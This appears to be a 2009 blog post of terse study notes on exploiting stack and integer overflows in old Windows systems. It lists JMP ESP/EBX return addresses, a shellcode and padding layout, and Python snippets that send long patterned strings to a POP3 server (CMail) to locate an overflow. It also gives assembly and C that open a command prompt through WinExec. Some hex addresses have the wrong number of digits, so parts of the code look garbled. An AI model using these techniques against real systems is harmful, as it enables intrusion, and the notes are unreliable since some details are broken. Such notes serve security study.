Wednesday, December 16, 2009

Stack and Integer Overflow

Stack Overflow

-Common address for XP, 2000 and 2003, JMP EBX address = 0x7ffa1571 0x7ffa4a1, JMP ESP = 0x7ffa4512

- Sometime after jmp esp, it cant follow the with the shellcode, eg in MS03-049 Workstation Service Overflow and MS03-026 RPC Overflow. Sometime they need the gap there. Maybe 8 bytes, so when testing, it shod be

jmp esp ---> testing code ( eg, eb fe ) ---> shellcode

Solution :
1. Place the shellcode in front at the return address

SHELLCODE | AAAAAAAAAA... | JMP ESP | AAAAAAAA..... |

2. Add in some junk code in the gap

- To scan a host whether running the vulnerable application, we may scan it by analysis the network packet. Usually the patched will different with the unpatched version.

- To locate the overflow point, here the python code (for CMail) :

#1
import poplib
m= poplib.POP3('127.0.0.1')
s = 'a' * 100+'b' *100 + 'c'* 100 +'d'*100 +'e'* 100
m.user(s)

#2
import poplib
m= poplib.POP3('127.0.0.1')
s = 'a' * 400+ 'a' * 10 +'b' * 10 + 'c' * 10 +'d' * 10 +'e' * 10+ 'f' * 10+'g' *

10+'h' * 10+'i' * 10+'j' * 10
m.user(s)

- To open a command prompt

push ebp
mov ebp, esp
push ebx
mov byte ptr [ebp-4], 63h //'c'
mov byte ptr [ebp-3], 6Dh //'m'
mov byte ptr [ebp-2], 64h //'d'
mov byte ptr [ebp-1], 0 //'\0'

push 5 // #DEFINE SW_SHOW 5
lea eax, [ebp-4]
push eax
mov eax,0x777e4fd35
call eax
pop esp


#include
void main()
{
char cmdline[4] = "cmd"
WinExec(cmdline, SW_SHOW);
}



Interger Overflow

- The input could be a -ve value. When this input asigned to a unsigned variable, it will change to 0xffffffff for -1. This could trigger overflow by assigning a huge heap area.

- Usually this type overflow hard to use than usual stack or heap overflow.

- Example : JPEG integer overflow, Windows USER32 LoadImage API integer overflow, PuTTY SFTP Client interger overflow, Evolution camel-lock-helper interger overflow

No comments:

Post a Comment